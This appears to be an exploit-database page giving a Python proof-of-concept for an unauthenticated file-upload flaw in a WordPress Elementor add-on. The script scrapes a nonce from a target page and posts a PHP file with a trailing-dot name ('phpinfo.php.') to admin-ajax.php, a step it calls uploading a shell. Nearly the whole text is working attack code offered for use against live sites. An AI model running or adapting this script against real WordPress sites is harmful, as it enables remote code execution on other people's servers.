Share
## https://sploitus.com/exploit?id=WPEX-ID:C2CF5FD1-663D-4BC1-ADCD-E6064EB32ECE
Make sure you have Elementor installed and a page or post edited with Elementor.
Here's the python script that will execute the exploit.
from io import StringIO
import requests
from urllib import parse
import json
import sys
import re
import io
if len(sys.argv) != 2:
print('USAGE: python %s <target_elementor_page>' % (sys.argv[0],))
sys.exit()
elementor_url = sys.argv[1].rstrip('/')
parsed_url = parse.urlparse(elementor_url)
root_url = f'{parsed_url.scheme}://{parsed_url.netloc}'
with requests.Session() as s:
print('# Getting nonce..')
page = s.get(elementor_url).text
nonce = re.search(r'WprConfig = \{.*"nonce":"([a-f0-9]+)"', page).groups()
if len(nonce) == 0:
print('Error: Couldn\'t get nonce.')
sys.exit()
nonce = nonce[0]
print('# Uploading shell..')
shell = io.BytesIO(b'<?php phpinfo();')
data = {
'wpr_addons_nonce': nonce,
'max_file_size': 100,
'allowed_file_types': ',',
'action': 'wpr_addons_upload_file',
'triggering_event': 'click',
}
file = {
'uploaded_file': ('phpinfo.php.', shell),
}
print(requests.post(f'{root_url}/wp-admin/admin-ajax.php', data=data, files=file).text)